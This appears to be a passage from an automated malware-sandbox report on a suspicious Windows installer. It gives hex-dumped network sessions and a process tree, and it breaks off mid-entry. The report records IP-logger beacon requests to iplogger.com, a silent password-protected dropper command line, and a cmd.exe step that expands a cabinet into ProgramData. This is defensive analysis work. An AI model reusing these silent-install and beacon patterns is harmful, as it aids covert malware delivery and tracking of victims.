                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 402 Payment RequiredCache-control: no-cache="set-cookie"Content-Type: application/json; charset=utf-8Date: Wed, 06 Dec 2023 13:34:06 GMTETag: W/"2-vyGp6PvFo4RvsFtPoIWeCReyIC8"Set-Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DE
                                                                                                                                                                                                                                                                        2023-12-06 13:34:06 UTC2INData Raw: 7b 7d
                                                                                                                                                                                                                                                                        Data Ascii: {}


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        20192.168.2.55014654.165.38.2324438128C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:34:06 UTC547OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                                                                                                                                        User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                                                                                                                                                                                                                                        Host: collect.installeranalytics.com
                                                                                                                                                                                                                                                                        Content-Length: 165
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DE10DBFD7E5D4AE6378040B3BE1E956BB85F2EBC23C045F574631A85FC4B0029A60C6D2CA10A361ABFE791980D7197FFA6; AWSELBCORS=2939936F10270D1CC9821964991403D8EB363D63DE10DBFD7E5D4AE6378040B3BE1E956BB85F2EBC23C045F574631A85FC4B0029A60C6D2CA10A361ABFE791980D7197FFA6
                                                                                                                                                                                                                                                                        2023-12-06 13:34:06 UTC165OUTData Raw: 71 74 3d 36 38 35 30 32 30 32 26 74 3d 6c 69 66 65 63 79 63 6c 65 26 6c 63 3d 73 74 61 72 74 26 76 3d 33 26 61 69 64 3d 35 37 61 64 66 35 66 33 34 38 32 62 39 61 35 30 33 65 32 62 65 64 32 62 26 61 76 3d 35 2e 30 2e 33 26 63 69 64 3d 35 37 46 31 41 42 38 39 32 39 46 45 37 32 42 39 45 44 37 39 46 34 35 39 30 43 39 38 42 32 37 44 34 43 30 36 46 42 38 44 26 73 69 64 3d 25 37 42 38 30 31 32 45 37 30 34 2d 30 36 42 46 2d 34 33 37 41 2d 38 36 44 35 2d 30 45 32 42 46 35 33 44 39 43 31 46 25 37 44
                                                                                                                                                                                                                                                                        Data Ascii: qt=6850202&t=lifecycle&lc=start&v=3&aid=57adf5f3482b9a503e2bed2b&av=5.0.3&cid=57F1AB8929FE72B9ED79F4590C98B27D4C06FB8D&sid=%7B8012E704-06BF-437A-86D5-0E2BF53D9C1F%7D
                                                                                                                                                                                                                                                                        2023-12-06 13:34:07 UTC219INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 32 20 50 61 79 6d 65 6e 74 20 52 65 71 75 69 72 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 36 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 34 3a 30 36 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 32 2d 76 79 47 70 36 50 76 46 6f 34 52 76 73 46 74 50 6f 49 57 65 43 52 65 79 49 43 38 22 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 43 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 402 Payment RequiredContent-Type: application/json; charset=utf-8Date: Wed, 06 Dec 2023 13:34:06 GMTETag: W/"2-vyGp6PvFo4RvsFtPoIWeCReyIC8"X-Powered-By: ExpressContent-Length: 2Connection: Close
                                                                                                                                                                                                                                                                        2023-12-06 13:34:07 UTC2INData Raw: 7b 7d
                                                                                                                                                                                                                                                                        Data Ascii: {}


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        21192.168.2.55018154.165.38.232443
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:34:24 UTC241OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                                                                                                                                        User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                                                                                                                                                                                                                                        Host: collect.installeranalytics.com
                                                                                                                                                                                                                                                                        Content-Length: 164
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2023-12-06 13:34:24 UTC164OUTData Raw: 71 74 3d 32 38 38 39 32 31 26 74 3d 6c 69 66 65 63 79 63 6c 65 26 6c 63 3d 73 74 61 72 74 26 76 3d 33 26 61 69 64 3d 35 37 61 64 66 35 66 33 34 38 32 62 39 61 35 30 33 65 32 62 65 64 32 62 26 61 76 3d 35 2e 30 2e 33 26 63 69 64 3d 35 37 46 31 41 42 38 39 32 39 46 45 37 32 42 39 45 44 37 39 46 34 35 39 30 43 39 38 42 32 37 44 34 43 30 36 46 42 38 44 26 73 69 64 3d 25 37 42 37 38 38 35 35 44 36 46 2d 41 46 37 32 2d 34 36 38 41 2d 39 31 32 45 2d 41 36 46 44 33 41 32 46 42 31 42 39 25 37 44
                                                                                                                                                                                                                                                                        Data Ascii: qt=288921&t=lifecycle&lc=start&v=3&aid=57adf5f3482b9a503e2bed2b&av=5.0.3&cid=57F1AB8929FE72B9ED79F4590C98B27D4C06FB8D&sid=%7B78855D6F-AF72-468A-912E-A6FD3A2FB1B9%7D
                                                                                                                                                                                                                                                                        2023-12-06 13:34:24 UTC638INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 32 20 50 61 79 6d 65 6e 74 20 52 65 71 75 69 72 65 64 0d 0a 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 3d 22 73 65 74 2d 63 6f 6f 6b 69 65 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 36 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 34 3a 32 34 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 32 2d 76 79 47 70 36 50 76 46 6f 34 52 76 73 46 74 50 6f 49 57 65 43 52 65 79 49 43 38 22 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 41 57 53 45 4c 42 3d 32 39 33 39 39 33 36 46 31 30 32 37 30 44 31 43 43 39 38 32 31 39 36 34 39 39 31 34 30 33 44 38 45 42 33 36 33 44 36 33 44 45
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 402 Payment RequiredCache-control: no-cache="set-cookie"Content-Type: application/json; charset=utf-8Date: Wed, 06 Dec 2023 13:34:24 GMTETag: W/"2-vyGp6PvFo4RvsFtPoIWeCReyIC8"Set-Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DE
                                                                                                                                                                                                                                                                        2023-12-06 13:34:24 UTC2INData Raw: 7b 7d
                                                                                                                                                                                                                                                                        Data Ascii: {}


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        22192.168.2.55018254.165.38.232443
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:34:26 UTC547OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                                                                                                                                        User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                                                                                                                                                                                                                                        Host: collect.installeranalytics.com
                                                                                                                                                                                                                                                                        Content-Length: 164
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DE10DBFD7E5D4AE6378040B3BE1E956BB85F2EBC23C045F574631A85FC4B0029A60C6D2CA10A361ABFE791980D7197FFA6; AWSELBCORS=2939936F10270D1CC9821964991403D8EB363D63DE10DBFD7E5D4AE6378040B3BE1E956BB85F2EBC23C045F574631A85FC4B0029A60C6D2CA10A361ABFE791980D7197FFA6
                                                                                                                                                                                                                                                                        2023-12-06 13:34:26 UTC164OUTData Raw: 71 74 3d 32 39 31 30 33 31 26 74 3d 6c 69 66 65 63 79 63 6c 65 26 6c 63 3d 73 74 61 72 74 26 76 3d 33 26 61 69 64 3d 35 37 61 64 66 35 66 33 34 38 32 62 39 61 35 30 33 65 32 62 65 64 32 62 26 61 76 3d 35 2e 30 2e 34 26 63 69 64 3d 35 37 46 31 41 42 38 39 32 39 46 45 37 32 42 39 45 44 37 39 46 34 35 39 30 43 39 38 42 32 37 44 34 43 30 36 46 42 38 44 26 73 69 64 3d 25 37 42 31 31 44 33 41 31 31 45 2d 38 37 34 34 2d 34 33 36 30 2d 39 38 31 30 2d 45 30 30 46 42 43 31 33 31 44 41 31 25 37 44
                                                                                                                                                                                                                                                                        Data Ascii: qt=291031&t=lifecycle&lc=start&v=3&aid=57adf5f3482b9a503e2bed2b&av=5.0.4&cid=57F1AB8929FE72B9ED79F4590C98B27D4C06FB8D&sid=%7B11D3A11E-8744-4360-9810-E00FBC131DA1%7D
                                                                                                                                                                                                                                                                        2023-12-06 13:34:26 UTC219INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 32 20 50 61 79 6d 65 6e 74 20 52 65 71 75 69 72 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 36 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 34 3a 32 36 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 32 2d 76 79 47 70 36 50 76 46 6f 34 52 76 73 46 74 50 6f 49 57 65 43 52 65 79 49 43 38 22 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 43 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 402 Payment RequiredContent-Type: application/json; charset=utf-8Date: Wed, 06 Dec 2023 13:34:26 GMTETag: W/"2-vyGp6PvFo4RvsFtPoIWeCReyIC8"X-Powered-By: ExpressContent-Length: 2Connection: Close
                                                                                                                                                                                                                                                                        2023-12-06 13:34:26 UTC2INData Raw: 7b 7d
                                                                                                                                                                                                                                                                        Data Ascii: {}


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        23192.168.2.550186142.251.16.1384432972C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:34:49 UTC449OUTGET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=00000000000000000000000000000000000000006416C752B8 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: clients1.google.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        2023-12-06 13:34:49 UTC817INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 73 63 72 69 70 74 2d 73 72 63 20 27 72 65 70 6f 72 74 2d 73 61 6d 70 6c 65 27 20 27 6e 6f 6e 63 65 2d 35 77 70 63 63 67 71 63 4b 69 34 6c 41 6f 5a 41 6e 6a 62 61 50 41 27 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 73 74 72 69 63 74 2d 64 79 6e 61 6d 69 63 27 20 68 74 74 70 73 3a 20 68 74 74 70 3a 3b 6f 62 6a 65 63 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 72 65 70 6f 72 74 2d 75 72 69 20 68 74 74 70 73 3a 2f 2f 63 73 70 2e 77 69 74 68 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 73 70 2f 64 6f 77 6e 6c 6f 61 64 2d 64 74 2f 31 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 200 OKContent-Security-Policy: script-src 'report-sample' 'nonce-5wpccgqcKi4lAoZAnjbaPA' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1Content-Security-P
                                                                                                                                                                                                                                                                        2023-12-06 13:34:49 UTC219INData Raw: 72 6c 7a 43 31 3a 20 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 38 37 0a 72 6c 7a 43 32 3a 20 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 38 37 0a 72 6c 7a 43 37 3a 20 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 38 37 0a 64 63 63 3a 20 0a 73 65 74 5f 64 63 63 3a 20 43 31 3a 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 38 37 2c 43 32 3a 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 38 37 2c 43 37 3a 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 38 37 0a 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 2c 43 31 53 2c 43 37 53 0a 73 74 61 74 65 66 75 6c 2d 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 0a 63 72 63 33 32 3a 20 32 65 31 35 66 38 39 0a
                                                                                                                                                                                                                                                                        Data Ascii: rlzC1: 1C1ONGR_enUS1087rlzC2: 1C2ONGR_enUS1087rlzC7: 1C7ONGR_enUS1087dcc: set_dcc: C1:1C1ONGR_enUS1087,C2:1C2ONGR_enUS1087,C7:1C7ONGR_enUS1087events: C1I,C2I,C7I,C1S,C7Sstateful-events: C1I,C2I,C7Icrc32: 2e15f89


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        24192.168.2.550188104.21.12.138443
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:34:51 UTC106OUTGET /1gWvm4 HTTP/1.1
                                                                                                                                                                                                                                                                        User-Agent: InnoDownloadPlugin/1.4.3
                                                                                                                                                                                                                                                                        Host: iplogger.com
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        2023-12-06 13:34:51 UTC1140INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 36 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 34 3a 35 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 35 31 33 36 34 38 37 35 31 37 32 32 31 30 31 38 34 33 3d 33 3b 20 65 78 70 69 72 65 73 3d 46 72 69 2c 20 30 36 20 44 65 63 20 32 30 32 34 20 31 33 3a 33 34 3a 35 31 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 33 31 36 32 32 34 30 30 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 61 6d 65 53 69 74 65 3d 53 74 72
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 200 OKDate: Wed, 06 Dec 2023 13:34:51 GMTContent-Type: image/pngTransfer-Encoding: chunkedConnection: closeset-cookie: 513648751722101843=3; expires=Fri, 06 Dec 2024 13:34:51 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Str
                                                                                                                                                                                                                                                                        2023-12-06 13:34:51 UTC122INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                                                                                                                                                                                                                                                        2023-12-06 13:34:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        25192.168.2.550189104.21.12.138443
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:34:52 UTC163OUTGET /1gYvm4 HTTP/1.1
                                                                                                                                                                                                                                                                        User-Agent: InnoDownloadPlugin/1.4.3
                                                                                                                                                                                                                                                                        Host: iplogger.com
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cookie: 513648751722101843=3; clhf03028ja=102.165.48.83
                                                                                                                                                                                                                                                                        2023-12-06 13:34:53 UTC1005INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 36 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 34 3a 35 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 35 31 33 36 35 30 30 34 31 37 32 32 31 30 31 38 34 33 3d 33 3b 20 65 78 70 69 72 65 73 3d 46 72 69 2c 20 30 36 20 44 65 63 20 32 30 32 34 20 31 33 3a 33 34 3a 35 33 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 33 31 36 32 32 34 30 30 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 61 6d 65 53 69 74 65 3d 53 74 72
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 200 OKDate: Wed, 06 Dec 2023 13:34:53 GMTContent-Type: image/pngTransfer-Encoding: chunkedConnection: closeset-cookie: 513650041722101843=3; expires=Fri, 06 Dec 2024 13:34:53 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Str
                                                                                                                                                                                                                                                                        2023-12-06 13:34:53 UTC122INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                                                                                                                                                                                                                                                        2023-12-06 13:34:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                        Start time:14:32:54
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\ZmWSzgevgt.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\ZmWSzgevgt.exe
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:1'671'954 bytes
                                                                                                                                                                                                                                                                        MD5 hash:2DEAF2BE4672BF6457E136D78A7A3940
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                                                        Start time:14:32:54
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmp
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmp" /SL5="$20408,832512,832512,C:\Users\user\Desktop\ZmWSzgevgt.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:3'199'488 bytes
                                                                                                                                                                                                                                                                        MD5 hash:BE0E74DC6AC70C5B8CC74C42B6999A70
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                                                        Start time:14:33:04
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\is-0270L.tmp\setup.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\is-0270L.tmp\setup.exe
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:5'135'320 bytes
                                                                                                                                                                                                                                                                        MD5 hash:8657D8F7608F1E03726F5B0256869C66
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                                                        Start time:14:33:05
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp" /SL5="$1047E,4289520,832512,C:\Users\user\AppData\Local\Temp\is-0270L.tmp\setup.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:3'199'488 bytes
                                                                                                                                                                                                                                                                        MD5 hash:C039C014580F43E5B8162552F3CAF067
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                                                        Start time:14:33:13
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a0.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a0.exe" /VERYSILENT /PASSWORD=NtIRVUpMK9ZD30Nf98220 -token mtn1co3fo4gs5vwq -subid 2598
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:11'087'839 bytes
                                                                                                                                                                                                                                                                        MD5 hash:5AFE9D5A2BCC39B1E0573A77EFBE82B7
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                                                        Start time:14:33:13
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmp
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmp" /SL5="$204E6,10235147,832512,C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a0.exe" /VERYSILENT /PASSWORD=NtIRVUpMK9ZD30Nf98220 -token mtn1co3fo4gs5vwq -subid 2598
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:3'199'488 bytes
                                                                                                                                                                                                                                                                        MD5 hash:AD96645518D5ABDD4F96B007E799F61E
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                                                        Start time:14:33:15
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"cmd.exe" /c expand C:\Users\user\AppData\Local\Temp\is-TMJSM.tmp\{app}\aglwjhm.cab -F:* %ProgramData%
                                                                                                                                                                                                                                                                        Imagebase:0x790000
                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                                                        Start time:14:33:15
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                        File size:862'208 bytes
